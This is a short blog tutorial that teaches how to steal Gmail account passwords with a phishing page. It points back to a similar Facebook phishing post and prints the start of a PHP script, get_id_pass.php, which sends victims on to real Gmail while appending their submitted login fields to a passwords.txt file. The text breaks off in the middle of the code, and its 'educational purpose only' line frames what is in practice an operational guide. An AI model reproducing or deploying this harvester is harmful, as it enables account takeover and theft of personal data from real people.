How to Hack Gmail Account Using Phishing
How to Hack Gmail Account Using Phishing How to Hack Gmail Account Using Phishing, hello guys welcome to ctpoint.org. I am Blogger Ashok Punetha (W@R10CK) & today i am teach you how to hacking gmail account using phishing page. This Tutorial Only for Educational Purpose Only OK guys Lets Start I am already mention my previously post (How To Hack Facebook Using Phishing Method) how to make phishing page all steps are same for making Gmail Phishing Page. Read More Post>> How to view saved WiFi Password on Android Mobile How to make Android device add free If you don't read my previously post read from given bellow link How To Hack Facebook Using Phishing Method open notepad or text editor and paste the given bellow code & save as get_id_pass.php <?php header("Location: https://mail.google.com/mail/"); $handle = fopen("passwords.txt", "a"); foreach($_GET as $variable => $value) {fwrite($handle, $variable);fwrite($handle, ...